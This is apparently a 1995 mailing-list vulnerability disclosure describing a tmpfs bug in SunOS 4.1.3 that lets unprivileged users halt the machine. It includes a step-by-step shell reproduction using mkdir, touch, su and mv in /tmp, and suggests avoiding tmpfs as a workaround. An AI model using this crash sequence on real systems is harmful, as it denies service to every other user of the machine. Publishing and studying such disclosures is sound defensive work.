Another tmpfs bug in SunOS 4
Arfst Ludwig (Arfst.Ludwig luxor.in-berlin.de) Sat, 2 Dec 1995 23:50:40 +0100
Hi!
Unprivileged users can crash the system such
that a power down power up cycle is needed.
Vulnerable OS is (at least) SunOS 4.1.3.
With the right permissions (umask) the following
sequence crashes the system. The kernel does not
panic, nor does the abort sequence enter the boot
prompt; the system is halted and a power down is needed.
8<------------------------- cut here -------------------------
user1> cd /tmp
user1> mkdir foo
user1> su user2
user2> mkdir foo/bar
user2> touch foo/bar/{plop,blup}
user2> exit
user1> cd foo
user1> mv bar ..
8<------------------------- cut here -------------------------
/tmp's permissions are drwxrwxrwt root wheel
I have not explored this bug very much because of the
ungraceful consequences.
Workaround:
Avoid using (the marvelous) TMPFS filesystems :-(
or (IMHO even worse) switch to Solaris 2 ?
Cheers, Arfst
______________________________________________________________________
__
(00) Arfst Ludwig
\`\/ E-Mail: Arfst.Ludwig luxor.in-berlin.de
"" carpe diem